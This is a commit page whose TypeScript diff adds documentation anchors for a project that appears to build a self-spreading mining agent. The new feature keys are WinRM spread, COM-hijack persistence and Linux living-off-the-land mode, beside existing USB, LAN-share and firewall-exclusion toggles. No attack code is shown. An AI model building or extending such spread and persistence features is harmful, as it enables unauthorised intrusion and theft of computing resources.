Add forge spread toggles for WinRM and Linux LOTL
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled

This commit is contained in:
AetherForge
2026-06-07 00:43:21 -07:00
parent 9ad4cce194
commit 6761d4285c
13 changed files with 204 additions and 3 deletions

View File

@@ -68,6 +68,9 @@ export const DOC_ANCHORS: Record<string, string> = {
usb_spread: '/docs/SPREAD_TECHNIQUES.html#usb',
share_spread: '/docs/SPREAD_TECHNIQUES.html#lan',
auto_spread: '/docs/SPREAD_TECHNIQUES.html#lan',
winrm_spread: '/docs/SPREAD_TECHNIQUES.html#lan',
com_hijack_persist: '/docs/SPREAD_TECHNIQUES.html#lan',
linux_lotl_mode: '/docs/SPREAD_TECHNIQUES.html#lan',
remote_aggressive: '/docs/#crucible-ops',
mesh_p2p: '/docs/#platform-matrix',
hole_punch: '/docs/#crucible-ops',
@@ -80,6 +83,7 @@ export const DOC_ANCHORS: Record<string, string> = {
// Crucible / agent remote
firewall_remote: '/docs/#crucible-ops',
firewall_exclusion: '/docs/#agent',
crucible_section_spread_templates: '/docs/SPREAD_TECHNIQUES.html#lan',
// Mission / builds
spread_kit: '/docs/#forge',
@@ -98,6 +102,9 @@ export const DOC_ANCHORS: Record<string, string> = {
websocket_ping_seconds: '/docs/#calibrate',
log_pool_traffic: '/docs/#calibrate',
webhook_url: '/docs/#calibrate',
set_alerts: '/docs/#calibrate',
set_alert_notifications: '/docs/#calibrate',
set_webhook: '/docs/#calibrate',
// Dashboard / fleet UI
dash_fleet_health: '/docs/#dashboard',